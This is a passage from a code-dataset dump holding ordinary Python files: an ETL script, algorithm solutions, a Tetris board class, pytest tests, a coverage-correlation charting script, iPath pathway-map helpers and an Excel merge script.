column] = 1\n # drop the column - categories and concatenate the cleaned set of splitted columns\n df = df.drop('categories', axis=1)\n df = pd.concat([df, categories], axis=1)\n df_cleaned = df.drop_duplicates()\n return df_cleaned\n\n\ndef save_data(df, database_filename):\n \"\"\"\n save the clean data set into an sqlite database replacing if exist\n :param df: pandas data frame to save\n :param database_filename: database name with extension .db\n ex: messages.db\n :return: None\n \"\"\"\n table_name = 'labelled_disaster_messages'\n engine = create_engine('sqlite:///{}'.format(database_filename))\n df.to_sql(table_name, engine, index=False, if_exists='replace')\n\n\ndef main():\n \"\"\"\n main function to run the ETL pipeline\n 1. load the csv files\n 2. data cleaning\n 3. data loading to sqlite database\n \"\"\"\n if len(sys.argv) == 4:\n messages_filepath, categories_filepath, database_filepath = sys.argv[1:]\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n df = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n df = clean_data(df)\n\n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n save_data(df, database_filepath)\n\n print('Cleaned data saved to database!')\n\n else:\n print('Please provide the filepaths of the messages and categories ' \\\n 'datasets as the first and second argument respectively, as ' \\\n 'well as the filepath of the database to save the cleaned data ' \\\n 'to as the third argument. \\n\\nExample: python process_data.py ' \\\n 'disaster_messages.csv disaster_categories.csv ' \\\n 'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Dinusha519/disaster_response_pipeline","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1252494898","text":"N, M = map(int, input().split())\nMap = [list(input()) for _ in range(N)]\n\nused = [[0]*M for _ in range(N)]\ndef BFS(y, x):\n used[y][x] = 1\n queue = [(y, x)]\n dy = [-1, 1, 0, 0]\n dx = [0, 0, -1, 1]\n cnt = 0\n\n while queue:\n y, x = queue.pop(0)\n for i in range(4):\n ny = y + dy[i]\n nx = x + dx[i]\n if 0 <= ny < N and 0 <= nx < M:\n if Map[ny][nx] == 'X': continue\n if used[ny][nx] == 1: continue\n if Map[ny][nx] == 'P':\n cnt += 1\n queue.append((ny, nx))\n used[ny][nx] = 1\n return cnt\n\nresult = 0\nfor i in range(N):\n for j in range(M):\n if Map[i][j] == 'I':\n result = BFS(i, j)\n\nif result:\n print(result)\nelse:\n print('TT')\n\n","repo_name":"swjiae/Algorithm","sub_path":"Algorithm/AlgoStudy/Week2/BFS_21736.py","file_name":"BFS_21736.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20298536772","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = \"ipetrash\"\n\n\nfrom PyQt5.QtCore import QObject, pyqtSignal\nfrom PyQt5.QtGui import QColor\n\nfrom common import logger\nfrom piece import Piece\n\n\nclass Board(QObject):\n ROWS = 20\n COLS = 10\n\n on_update_score = pyqtSignal(int)\n\n def __init__(self):\n super().__init__()\n\n self.matrix: list[list[QColor | None]] = [\n [None for _ in range(self.COLS)]\n for _ in range(self.ROWS)\n ]\n\n self.current_piece: Piece = None\n self.next_piece: Piece = None\n\n self.__score: int = 0\n\n @property\n def score(self) -> int:\n return self.__score\n\n @score.setter\n def score(self, value: int):\n self.__score = value\n self.on_update_score.emit(self.score)\n\n def add_piece(self, piece: Piece):\n logger.debug(\"[add_piece]\")\n for x, y in piece.get_points():\n self.matrix[y][x] = piece.get_color()\n\n def _do_make_collapse_of_rows(self):\n to_delete = []\n for row in reversed(self.matrix):\n if all(color for color in row):\n to_delete.append(row)\n\n for row in to_delete:\n self.matrix.remove(row)\n self.matrix.insert(0, [None for _ in range(self.COLS)])\n\n # Если были удалены строки\n if to_delete:\n self.score += {1: 100, 2: 300, 3: 700, 4: 1500}[len(to_delete)]\n\n def _get_random_piece(self) -> Piece:\n return Piece.get_random(\n x=self.COLS // 2, # По-умолчанию, по центру\n y=0,\n parent=self,\n )\n\n def do_step(self) -> bool:\n if not self.current_piece:\n if self.next_piece:\n self.current_piece = self.next_piece\n else:\n self.current_piece = self._get_random_piece()\n\n self.next_piece = self._get_random_piece()\n\n # Если сразу после создания столкновение\n if self.current_piece.is_collapse():\n return False\n\n return True\n\n if not self.current_piece.move_down():\n self.add_piece(self.current_piece)\n self.current_piece = None\n\n self._do_make_collapse_of_rows()\n\n return True\n","repo_name":"gil9red/SimplePyScripts","sub_path":"games/tetris/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":141,"dataset":"github-code","pt":"5"} +{"seq_id":"70903428951","text":"import gin\nimport random\nimport typer\n\n# allows typer commands\napp = typer.Typer()\n\n# configurables for gin\n@gin.configurable()\ndef function(name, food, price=gin.REQUIRED):\n '''print favorite food'''\n print('%s likes %s, if cheaper than %s.' %(name, food, round(price, 2)))\n return\n\n# make existing function configurable\ngin.external_configurable(random.uniform)\n\n# example to outline gin-config functionalities\n@app.command('config')\ndef gin_config_example():\n\n gin.parse_config_file('config.gin')\n\n # root scope\n function()\n\n # sub-scope\n with gin.config_scope('ana'): function()\n with gin.config_scope('wessel'): function()\n\n# example to outline typer functionalities\n@app.command('typer')\ndef typer_example(scope:str, showroot:bool = True):\n\n gin.parse_config_file('config.gin')\n\n # root scope\n if showroot:\n function()\n \n # sub-scope\n with gin.config_scope(scope): function()\n\n\n\ndef cli() -> None:\n \"\"\"Helper function to start cli via poetry scripts.\"\"\"\n app()\n\nif __name__ == '__main__':\n app()\n\n\n\n","repo_name":"mkmbader/ginconfig","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6070142133","text":"#\n# @lc app=leetcode id=375 lang=python3\n#\n# [375] Guess Number Higher or Lower II\n#\n\n\n# @lc code=start\nclass Solution:\n def getMoneyAmount(self, n: int) -> int:\n dp = [[0] * (n + 1) for _ in range(n + 1)]\n for length in range(2, n + 1):\n for start in range(n - length + 1):\n local_min = float(\"inf\")\n for piv in range(start, start + length):\n local_min = min(\n local_min,\n piv + 1 + max(dp[start][piv], dp[piv + 1][start + length]))\n dp[start][start + length] = local_min\n return dp[0][-1]\n\n\n# @lc code=end\n","repo_name":"mingaki/leetcode","sub_path":"375.guess-number-higher-or-lower-ii.py","file_name":"375.guess-number-higher-or-lower-ii.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71551050071","text":"import json\nimport os\nfrom pathlib import Path\n\nimport jsonref # type: ignore\nimport pytest\n\nfrom json_expand_o_matic import JsonExpandOMatic\n\n\ndef idfn(fixture_value):\n if fixture_value == {}:\n return \"\"\n return \"+\".join([f\"{k}:{v}\" for k, v in fixture_value.items()])\n\n\nclass TestSimple:\n \"\"\"Test the basics.\"\"\"\n\n # Our raw test data.\n _raw_data = None\n\n @pytest.fixture\n def raw_data(self, resource_path_root):\n if not TestSimple._raw_data:\n TestSimple._raw_data = json.loads((resource_path_root / \"actor-data.json\").read_text())\n return TestSimple._raw_data\n\n # Fixtures to provide copies of the raw data to each test function.\n\n @pytest.fixture(\n params=[\n {},\n # ExpansionPool parameters.\n # This tests acceptable combinations.\n # Combinations that would fail assertions\n # (e.g. - in ExpansionPool._set_pool_size) are not included.\n {\"pool_disable\": True}, # Force pool_size=1\n {\"pool_size\": 0}, # pool_size will be os.cpu_count()\n {\"pool_size\": 1}, # pool_ratio is ignored\n {\"pool_size\": 2}, # pool_mode default is SharedMemoryArray\n {\"pool_size\": 2, \"pool_mode\": \"ArrayOfTuples\"},\n {\"pool_ratio\": 0.5}, # pool_size must be None\n # ExpansionZipper parameters.\n # Not exercising OutputChoice yet.\n {\"zip_root\": \"foo\"},\n {\"zip_root\": \"bar\", \"zip_file\": \"zippy\"},\n {\"zip_file\": \"zipster.zip\"},\n {\"zip_output\": \"UnZipped\"},\n ],\n ids=idfn,\n )\n def expander_options(self, request):\n yield request.param\n\n @pytest.fixture(\n params=[\n {\"hash_mode\": None},\n {\"hash_mode\": \"HASH_MD5\"},\n ],\n ids=[\"NoChecksum\", \"HASH_MD5\"],\n )\n def hash_option(self, request):\n yield request.param\n\n @pytest.fixture\n def test_data(self, raw_data):\n return json.loads(json.dumps(raw_data))\n\n @pytest.fixture\n def original_data(self, raw_data):\n return json.loads(json.dumps(raw_data))\n\n def test_equivalency(self, test_data, original_data):\n # Assert that independent copies of the raw data are equivalent.\n assert test_data == original_data\n\n def test_expand_preserve(self, tmpdir, test_data, original_data, expander_options, hash_option):\n expanded = JsonExpandOMatic(path=tmpdir).expand(\n test_data, root_element=\"root\", preserve=True, **expander_options, **hash_option\n )\n\n ref_root = expander_options.get(\"zip_root\", tmpdir.basename)\n\n # preserve=True prevents mangling of test_data by expand()\n assert test_data == original_data\n\n # expand() returns a new representation of `data`\n assert expanded == {\"root\": {\"$ref\": f\"{ref_root}/root.json\"}}\n\n def test_expand_mangle(self, tmpdir, test_data, original_data, expander_options, hash_option):\n expanded = JsonExpandOMatic(path=tmpdir).expand(\n test_data, root_element=\"root\", preserve=False, **expander_options, **hash_option\n )\n\n if \"zip_root\" in expander_options:\n ref_root = expander_options[\"zip_root\"]\n root_json = Path(tmpdir) / expander_options[\"zip_root\"] / \"root.json\"\n else:\n ref_root = tmpdir.basename\n root_json = Path(tmpdir) / \"root.json\"\n\n # preserve=True allows mangling of test_data by expand()\n assert test_data != original_data\n\n # test_data is the content of \"{ref_root}/root.json\"\n assert test_data == json.loads(root_json.read_text())\n\n # expand() returns a new representation of `data`\n assert expanded == {\"root\": {\"$ref\": f\"{ref_root}/root.json\"}}\n\n def test_file_exixtence(self, tmpdir, test_data, original_data, expander_options):\n expanded = JsonExpandOMatic(path=tmpdir).expand(test_data, root_element=\"root\", **expander_options)\n\n if \"zip_root\" in expander_options:\n ref_root = expander_options[\"zip_root\"]\n json_root = Path(tmpdir) / expander_options[\"zip_root\"]\n else:\n ref_root = tmpdir.basename\n json_root = Path(tmpdir)\n\n assert expanded == {\"root\": {\"$ref\": f\"{ref_root}/root.json\"}}\n\n # This is the wrapper around the original data\n assert os.path.exists(f\"{json_root}/root.json\")\n assert os.path.exists(f\"{json_root}/root\")\n\n # Now we look at the original data's files\n assert os.path.exists(f\"{json_root}/root/actors.json\")\n assert os.path.exists(f\"{json_root}/root/actors\")\n # A file and directory for each actor\n assert os.path.exists(f\"{json_root}/root/actors/charlie_chaplin.json\")\n assert os.path.exists(f\"{json_root}/root/actors/charlie_chaplin\")\n assert os.path.exists(f\"{json_root}/root/actors/dwayne_johnson.json\")\n assert os.path.exists(f\"{json_root}/root/actors/dwayne_johnson\")\n # A file and directory for each actor's movies\n assert os.path.exists(f\"{json_root}/root/actors/charlie_chaplin/movies.json\")\n assert os.path.exists(f\"{json_root}/root/actors/charlie_chaplin/movies\")\n assert os.path.exists(f\"{json_root}/root/actors/dwayne_johnson/movies.json\")\n assert os.path.exists(f\"{json_root}/root/actors/dwayne_johnson/movies\")\n # A file and directory Charlie Chaplin's filmography.\n assert os.path.exists(f\"{json_root}/root/actors/charlie_chaplin/filmography.json\")\n assert os.path.exists(f\"{json_root}/root/actors/charlie_chaplin/filmography\")\n # I didn't define filmography test data for Dwayne Johnson.\n assert not os.path.exists(f\"{json_root}/root/actors/dwayne_johnson/filmography.json\")\n assert not os.path.exists(f\"{json_root}/root/actors/dwayne_johnson/filmography\")\n # But I did define an empty hobbies directory for Dwayne Johnson so we will have\n # a file but not a directory (since there was nothing to recurse into).\n assert os.path.exists(f\"{json_root}/root/actors/dwayne_johnson/hobbies.json\")\n assert not os.path.exists(f\"{json_root}/root/actors/dwayne_johnson/hobbies\")\n\n # I'm not going to go any deeper. You get the idea...\n # See `test_leaves.py` for some more interesting things about the files.\n\n def test_contract(self, tmpdir, test_data, original_data):\n expanded = JsonExpandOMatic(path=tmpdir).expand(test_data, root_element=\"root\", preserve=False)\n assert expanded == {\"root\": {\"$ref\": f\"{tmpdir.basename}/root.json\"}}\n\n # We can use JsonExpandOMatic() to load the expanded data from the filesystem.\n # Note that this returns the original data exactly, the `root` wrapper is removed.\n contracted = JsonExpandOMatic(path=tmpdir).contract(root_element=\"root\")\n assert contracted == original_data\n\n # Or we can use jsonref.load() to do the same.\n with open(f\"{tmpdir}/root.json\") as f:\n assert jsonref.load(f, base_uri=f\"file://{tmpdir}/\") == original_data\n\n def test_jsonref(self, tmpdir, test_data, original_data):\n expanded = JsonExpandOMatic(path=tmpdir).expand(test_data, root_element=\"root\", preserve=False)\n\n # We can use jsonref to load this new representation.\n # Note that loading in this way exposes the wrapping element `root`.\n # `tmpdir` must be a fully qualified path.\n loaded = jsonref.loads(json.dumps(expanded), base_uri=f\"file://{tmpdir.dirname}/\")\n assert loaded == {\"root\": original_data}\n assert loaded[\"root\"] == original_data\n\n # A raw load of the wrapping document has references to the sub-elements.\n # This assersion assumes that the original data's elements are all dicts.\n with open(f\"{tmpdir}/root.json\") as f:\n assert json.load(f) == {k: {\"$ref\": f\"root/{k}.json\"} for k, v in original_data.items()}\n","repo_name":"jcejohnson/JsonExpandOMatic","sub_path":"tests/test_simple.py","file_name":"test_simple.py","file_ext":"py","file_size_in_byte":7955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22461102996","text":"#!/usr/bin/python3\n\nimport sys\nimport argparse\nimport json\nimport os\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport math\nimport numpy as np\nfrom scipy import stats\n\n# Global vars\nscript_dir = os.path.dirname(os.path.realpath(__file__))\nin_file = script_dir + '/obfuscated_data.json'\nout_file_sys_repo = 'system_repos.csv'\nout_file_zero_bugs = 'zero_bugs_comp.csv'\nout_file_with_bugs = 'with_bugs_comp.csv'\nout_file_generic = 'generic_comp.csv'\nout_file_component = 'component.csv'\n\n####################################################################################################\n\ndef generate_chart(title, x, x_title, y, y_title, sizes):\n df = {\n x_title: x,\n y_title: y,\n \"Legenda\": \"Repositórios\"\n }\n\n # Calculate Pearson correlation\n pearson_result = stats.pearsonr(x, y)\n correlation = pearson_result[0]\n pvalue = pearson_result[1]\n print(\"Pearson Correlation R=\" + str(correlation))\n print(\"p-value={}%\".format(str(pvalue*100)))\n\n # Generate chart\n fig = px.scatter(df, x_title, y=y_title, size=sizes,\n trendline=\"ols\")\n fig.update_layout(title_text = title, title_font_size=13)\n\n fig.show()\n\n####################################################################################################\n\ndef get_json_data():\n data = None\n\n with open(in_file) as f:\n data = json.load(f)\n\n return data\n\n####################################################################################################\n\ndef is_valid_component(component):\n # To be a valid component it has to contain at least one repository\n return len(component['reposCoverage']) > 0\n\n####################################################################################################\n\ndef system_repos_report(output_type):\n # Initialize body\n csv_body = \"Repository,Total,Covered\\n\"\n chart_x = []\n chart_y = []\n chart_size = []\n\n # Get data\n data = get_json_data()\n\n # Parse data\n for repo in data['System repos']['reposCoverage']:\n covered = data['System repos']['reposCoverage'][repo]['lines-covered']\n total = data['System repos']['reposCoverage'][repo]['lines-valid']\n rate = covered/total\n\n # Fill for CSV\n csv_body += \"{0},{1},{2}\\n\".format(repo, total, covered)\n\n # Fill for chart\n chart_x.append(total)\n chart_y.append(rate * 100)\n chart_size.append(10)\n\n if output_type == 'csv':\n # Write file\n print('Generating CSV file...')\n with open(script_dir + '/' + out_file_sys_repo, 'w') as f:\n f.write(csv_body)\n else:\n # Generate chart\n generate_chart('Tamanho em linhas x Cobertura de código',\n chart_x, 'Linhas de código',\n chart_y, 'Cobertura de código (%)',\n chart_size)\n\n####################################################################################################\n\ndef zero_bugs_report(output_type):\n # Initialize body\n csv_body = \"Component,Bugs,Total,Covered\\n\"\n chart_x = []\n chart_y = []\n chart_size = []\n\n # Get data\n data = get_json_data()\n\n # Parse data\n for item in data:\n # Skip not component items\n if not data[item]['isComponent']:\n continue\n\n # Skip invalid components\n if not is_valid_component(data[item]):\n continue\n\n # Skip components with bugs\n if int(data[item]['bugs']) > 0:\n continue\n\n # Sum lines of repositories\n total = 0\n covered = 0\n for repo in data[item]['reposCoverage']:\n total += data[item]['reposCoverage'][repo]['lines-valid']\n covered += data[item]['reposCoverage'][repo]['lines-covered']\n\n # Fill for CSV\n csv_body += \"{0},{1},{2},{3}\\n\".format(item, 0, total, covered)\n\n # Fill for chart\n chart_x.append(total)\n chart_y.append((covered/total) * 100)\n chart_size.append(10)\n\n if output_type == 'csv':\n # Write file\n with open(script_dir + '/' + out_file_zero_bugs, 'w') as f:\n f.write(csv_body)\n else:\n # Generate chart\n generate_chart('Tamanho em linhas x Cobertura de código '\n '(funcionalidades sem falhas reportadas)',\n chart_x, 'Linhas de código',\n chart_y, 'Cobertura de código (%)',\n chart_size)\n\n####################################################################################################\n\ndef with_bugs_report(output_type):\n # Initialize body\n csv_body = \"Component,Bugs,Total,Covered\\n\"\n chart_x = []\n chart_y = []\n chart_size = []\n\n # Get data\n data = get_json_data()\n\n # Parse data\n for item in data:\n # Skip not component items\n if not data[item]['isComponent']:\n continue\n\n # Skip invalid components\n if not is_valid_component(data[item]):\n continue\n\n # Skip components with no bugs\n if int(data[item]['bugs']) == 0:\n continue\n\n # Sum lines of repositories\n total = 0\n covered = 0\n for repo in data[item]['reposCoverage']:\n total += data[item]['reposCoverage'][repo]['lines-valid']\n covered += data[item]['reposCoverage'][repo]['lines-covered']\n\n # Fill for CSV\n csv_body += \"{0},{1},{2},{3}\\n\".format(item, data[item]['bugs'], total, covered)\n\n # Fill for chart\n chart_x.append((covered/total) * 100)\n chart_y.append(data[item]['bugs'])\n chart_size.append(math.sqrt(total))\n\n if output_type == 'csv':\n # Write file\n with open(script_dir + '/' + out_file_with_bugs, 'w') as f:\n f.write(csv_body)\n else:\n # Generate chart\n generate_chart('Cobertura de código x Falhas reportadas '\n '(excluindo funcionalidades sem falhas reportadas)',\n chart_x, 'Cobertura de código (%)',\n chart_y, 'Falhas reportadas',\n chart_size)\n\n####################################################################################################\n\ndef generic_report(output_type):\n # Initialize body\n csv_body = \"Component,Bugs,Total,Covered\\n\"\n csv_body = \"Component,Bugs,Total,Covered\\n\"\n chart_x = []\n chart_y = []\n chart_size = []\n\n # Get data\n data = get_json_data()\n\n # Parse data\n for item in data:\n # Skip not component items\n if not data[item]['isComponent']:\n continue\n\n # Skip invalid components\n if not is_valid_component(data[item]):\n continue\n\n # Sum lines of repositories\n total = 0\n covered = 0\n for repo in data[item]['reposCoverage']:\n total += data[item]['reposCoverage'][repo]['lines-valid']\n covered += data[item]['reposCoverage'][repo]['lines-covered']\n\n # Fill for CSV\n csv_body += \"{0},{1},{2},{3}\\n\".format(item, data[item]['bugs'], total, covered)\n\n # Fill for chart\n chart_x.append((covered/total) * 100)\n chart_y.append(data[item]['bugs'])\n chart_size.append(math.sqrt(total))\n\n if output_type == 'csv':\n # Write file\n with open(script_dir + '/' + out_file_generic, 'w') as f:\n f.write(csv_body)\n else:\n # Generate chart\n generate_chart('Cobertura de código x Falhas reportadas',\n chart_x, 'Cobertura de código (%)',\n chart_y, 'Falhas reportadas',\n chart_size)\n\n####################################################################################################\n\ndef component_report():\n # Initialize body\n csv_body = \"Component,Bugs,Repos,Lines\\n\"\n csv_body = \"Component,Bugs,Repos,Lines\\n\"\n chart_x = []\n chart_y = []\n chart_size = []\n\n # Get data\n data = get_json_data()\n\n # Parse data\n for item in data:\n # Skip not component items\n if not data[item]['isComponent']:\n continue\n\n # Get number of repositories\n n_repos = len(data[item]['reposCoverage'])\n\n # Sum lines of repos\n lines = 0\n for repo in data[item]['reposCoverage']:\n lines += data[item]['reposCoverage'][repo]['lines-valid']\n\n # Fill for CSV\n csv_body += \"{0},{1},{2},{3}\\n\".format(item, data[item]['bugs'], n_repos, lines)\n\n # Write file\n with open(script_dir + '/' + out_file_component, 'w') as f:\n f.write(csv_body)\n\n####################################################################################################\n\n###################\n# Argument parser #\n###################\nparser = argparse.ArgumentParser(\n description='Digest ' + in_file + ' and create a CSV file or a chart.')\nparser.add_argument('-o', '--output', default='csv', choices=['csv', 'chart'],\n help='Output type. Default is \\'csv\\'.')\n\ngroup_input = parser.add_mutually_exclusive_group(required=True)\n\ngroup_input.add_argument('-s', '--system-repos-report', action='store_true',\n help='Generate a report of system repositories. '\n 'Output file is ' + out_file_sys_repo)\n\ngroup_input.add_argument('-z', '--zero-bugs-report', action='store_true',\n help='Generate a report of valid components without bugs. '\n 'Output file is ' + out_file_zero_bugs)\n\ngroup_input.add_argument('-b', '--with-bugs-report', action='store_true',\n help='Generate a report of valid components with bugs. '\n 'Output file is ' + out_file_with_bugs)\n\ngroup_input.add_argument('-g', '--generic-report', action='store_true',\n help='Generate a report a report containing all valid components. '\n 'Output file is ' + out_file_generic)\n\ngroup_input.add_argument('-c', '--component', action='store_true',\n help='Generate a component report containing all components. '\n 'Output file is ' + out_file_generic)\n\nargs = parser.parse_args()\n\n###########\n# Execute #\n###########\n\nif args.system_repos_report:\n system_repos_report(args.output)\n\nelif args.zero_bugs_report:\n zero_bugs_report(args.output)\n\nelif args.with_bugs_report:\n with_bugs_report(args.output)\n\nelif args.component:\n # It does not generate chart\n if args.output == \"chart\":\n print('ERROR: component report does not generate chart')\n sys.exit(1)\n component_report()\n\nelse:\n generic_report(args.output)\n\nprint('Done!')\n","repo_name":"redivo/article-coverage-and-defects","sub_path":"data/digest_data.py","file_name":"digest_data.py","file_ext":"py","file_size_in_byte":10764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24835722105","text":"# -*- coding: utf-8 -*-\n\nfrom builtins import object\nclass GnrCustomWebPage(object):\n def main(self,root,**kwargs):\n root.css('.event_type_keydown',\"color:red;\")\n root.css('.event_type_keypress',\"color:green;\")\n bc = root.borderContainer(datapath='logger')\n fb = bc.contentPane(region='top',border_bottom='1px solid silver').formbuilder(cols=4)\n fb.input(value='^.curval',lbl='Test input',\n connect_onkeydown='genro.publish(\"log_event\",{evt:$1});',\n connect_onkeypress='genro.publish(\"log_event\",{evt:$1});')\n fb.checkbox(value='^.keydown',label='onkeydown',default=True)\n fb.checkbox(value='^.keypress',label='onkeypress',default=True)\n\n fb.button('Clear',action='SET .logdata = null;SET .curval=null;')\n bc.dataController(\"\"\"\n if(!data){\n data = new gnr.GnrBag();\n }else{\n data = data.deepCopy();\n }\n if(keydown && evt.type=='keydown' || keypress && evt.type=='keypress'){\n var row = new gnr.GnrBag();\n columns.forEach(function(c){row.setItem(c,evt[c]) });\n data.setItem('#id',row,{_customClasses:'event_type_'+evt.type},{_position:'<'});\n if(data.len()>10){data.popNode('#11');}\n SET .logdata = data;\n }\n evt.target.value = null;\n \"\"\",data='=.logdata',subscribe_log_event=True,\n keydown='=.keydown',\n keypress='=.keypress',\n columns=['type','charCode','keyIdentifier','keyChar','shiftKey','altKey','ctrlKey','metaKey']\n )\n center = bc.contentPane(region='center',margin='2px')\n center.quickGrid(value='^.logdata')\n\n","repo_name":"genropy/genropy_saved","sub_path":"projects/gnrcore/packages/test15/webpages/events/keyboard_logger.py","file_name":"keyboard_logger.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"13488737303","text":"import requests\nimport matplotlib as mpl\nimport pandas as pd\nimport numpy as np\nimport warnings\n\n\nvalues=[-10,-5,0,20]\n\ndef map_values_to_colors(values,\n non_negative_colormap='inferno',\n divergent_color_map='RdBu_r'):\n \"\"\" if values are non negative a sequencial colormap is used, if the values are negative and positive, a symetrical Red to blue colormap is used\"\"\"\n\n if all(np.array(values)>=0):\n norm = None\n cmap= non_negative_colormap\n else:\n extreme= np.abs(values).max()\n norm = mpl.colors.Normalize(vmin=-extreme,vmax=extreme)\n cmap=divergent_color_map\n\n color_scaler=mpl.cm.ScalarMappable(cmap= cmap,norm=norm)\n rgb=color_scaler.to_rgba(values)[:,:3]\n color_codes= ['RGB({:.0f},{:.0f},{:.0f})'.format(*tuple(row)) for row in rgb*255]\n\n return color_codes\n\n\ndef map_values_to_range(Values,output_range=[0,1],vmin=None,vmax=None):\n\n values= np.array(Values)\n\n\n if vmin is None: vmin= values.min()\n if vmax is None: vmax= values.max()\n\n\n if vmin<0:\n warnings.warn('minimum of values is negative, data will be mapped from [{},{}] -> [{},{}]'.format(vmin,vmax,*tuple(output_range)))\n\n diff= vmax-vmin\n\n\n\n # clip values\n values[np.where(values>vmax)[0]]=vmax\n values[np.where(values0\n\n return normed_values*out_diff+output_range[0]\n\n\n\n\n\ndef create_selection(data,color_column=None,width_column=None,opacity_column=None,color_kws=None,width_kws=None,opacity_kws=None):\n \"\"\"transforms a pandas dataframe to selection which can be used in ipath2:\n\n\n # Supported data types for indexes\n The following data types are supported by iPath, and can be used to customize the maps. Make sure you use the required prefix for each data type, as shown in the examples below.\n\n Data type\tPrefix\tExample ID\n KEGG Pathways\t-\t00650\n KEGG Compounds\t-\tC00003\n KEGG KOs\t-\tK01000\n STRING proteins\t-\t224324.AQ_626\n KEGG proteins\t-\taae:aq_626\n COGs/eggNOGG OGs\t-\tCOG0007\n Enzyme EC numbers\tE or EC\tE2.4.1.82\n Uniprot IDs/ACCs\tUNIPROT:\tUNIPROT:Q93015\n IPI IDs\t-\tIPI00745889\n NCBI GI IDs\tncbi-gi:\tncbi-gi:326314893\n\n\n \"\"\"\n\n\n\n assert type(data)== pd.DataFrame\n\n output_data= pd.DataFrame(index= data.index)\n\n if not color_column is None:\n if color_kws is None: color_kws={}\n output_data['color']= map_values_to_colors( data[color_column], **color_kws)\n\n if not width_column is None:\n\n width_default_param=dict(output_range=[0,50])\n if not width_kws is None: width_default_param.update(width_kws)\n\n output_data['Width']= map_values_to_range(data[width_column],**width_default_param).astype(str)\n output_data['Width']=\"W\"+output_data['Width']\n if not opacity_column is None:\n if opacity_kws is None: opacity_kws={}\n output_data['Opacity']= map_values_to_range(data[opacity_column],**opacity_kws).astype(str)\n\n output_str=''\n for i,row in output_data.iterrows():\n output_str+=' '.join([str(i)]+list(row))+'\\n'\n\n return output_str\n\n## Comunication\n\n\ndef to_parameters(selection ,\n export_type='svg',\n include_metabolic=True,\n include_secondary=False,\n include_antibiotic=False,\n include_microbial=False,\n whole_modules=False,\n whole_pathways=False,\n keep_colors=False,\n default_opacity=1,\n default_width=3,\n default_radius=7,\n default_color='#666666',\n query_reactions=False,\n tax_filter='',\n export_dpi=1200):\n\n allowed_export_types= ['svg','png','pdf','eps']\n assert export_type in allowed_export_types , \"export_type {} needs to be one of {}\".froamt(export_type,allowed_export_types)\n #assert map_type=='svg', \"I can not save PNG images\"\n\n return dict( selection=selection,\n export_type=export_type,\n keep_colors=int(keep_colors),\n include_metabolic=int(include_metabolic),\n include_secondary= int(include_secondary),\n include_antibiotic= int(include_antibiotic),\n include_microbial= int(include_microbial),\n whole_modules= int(whole_modules),\n default_opacity= default_opacity,\n whole_pathways=int(whole_pathways),\n default_width= default_width,\n default_color= default_color,\n default_radius= default_radius,\n query_reactions= int(query_reactions),\n tax_filter= tax_filter,\n export_dpi=export_dpi)\n\n # #\ndef get_map(selection,map_name='map',**param):\n\n url= 'https://pathways.embl.de/mapping.cgi'\n\n\n\n #print(selection[:300]+'...')\n parameters=to_parameters(selection,**param)\n\n r = requests.post(url, data=parameters)\n assert r.ok, r.text\n\n\n with open(map_name+'.svg','w') as file:\n file.write(r.text)\n\n\nfrom IPython.display import SVG\n\nimport svgutils.compose as sc\n\ndef scale_map(map_name):\n\n sc.Figure(\"26cm\", \"16cm\",\n sc.Panel(sc.SVG(map_name+\".svg\").scale(0.265)),\n ).save(map_name+'_scaled.svg')\n\n\ndef inspect_online(selection,**param):\n\n url= 'https://pathways.embl.de/ipath.cgi'\n\n\n parameters=to_parameters(selection,**param)\n\n r = requests.post(url, data=parameters)\n return r\n","repo_name":"SilasK/ipath3","sub_path":"ipath.py","file_name":"ipath.py","file_ext":"py","file_size_in_byte":5748,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"5"} +{"seq_id":"25152130672","text":"import pandas as pd\n\nsrcDirectory = '../4.1 일단위로 작업량 계산된 엑셀 파일/'\n\n\ndstDirectory = '../5.1 병합된 엑셀 파일/'\ndstFilename = '가공-도장-조립 취합_전체.xlsx'\n\nsrc1Filename = '1_가공실적_전체_2016.xlsx'\nsrc2AFilename = '2A_선행도장_전체_2016.xlsx'\nsrc2BFilename = '2B_선행도장_전체_2016.xlsx'\nsrc3Filename = '3_조립실적_전체_2016.xlsx'\n\nsrc1df = pd.read_excel(srcDirectory + src1Filename)\nprint(src1df.head())\n#print(src1df.columns)\n\n# Unnamed: 0 라는 이름의 열이 있는데, 그것을 제거하기\nsrc1df = src1df.drop(src1df.columns[0], axis=1)\nprint(src1df.head())\n\nsrc2Adf = pd.read_excel(srcDirectory + src2AFilename)\nprint(src2Adf.head())\n\n# Unnamed: 0 라는 이름의 열 및 date 열을 제거하기\nsrc2Adf = src2Adf.drop(src2Adf.columns[[0,1]], axis=1)\nprint(src2Adf.head())\n\nsrc2Bdf = pd.read_excel(srcDirectory + src2BFilename)\nprint(src2Bdf.head())\n\n# Unnamed: 0 라는 이름의 열 및 date 열을 제거하기\nsrc2Bdf = src2Bdf.drop(src2Bdf.columns[[0,1]], axis=1)\nprint(src2Bdf.head())\n\nsrc3df = pd.read_excel(srcDirectory + src3Filename)\nprint(src3df.head())\n\n# Unnamed: 0 라는 이름의 열 및 date 열을 